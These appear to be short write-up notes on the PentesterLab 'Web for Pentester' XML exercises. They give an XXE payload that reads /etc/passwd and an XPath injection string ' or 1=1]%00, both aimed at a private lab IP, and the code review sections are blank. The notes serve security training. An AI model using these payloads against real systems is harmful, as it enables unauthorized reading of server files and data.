Pentesterlab--Web for Pentester-XML
Web for Pentester: This exercise is a set of the most common web vulnerabilities
Difficluty: 1/5
OWASP: Testing for XML Injection
Example 1
code review
1 2 3 4 |
|
XML injection point search:
ZAP add fuzzing file:
https://wfuzz.googlecode.com/svn/trunk/wordlist/Injections/XML.txt
exploit:
http://192.168.79.162/xml/example1.php?xml=<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
needed to be encoded.
Example 2
code review
1 2 3 4 5 6 7 8 |
|
exploit:
http://192.168.79.162/xml/example2.php?name=' or 1=1]%00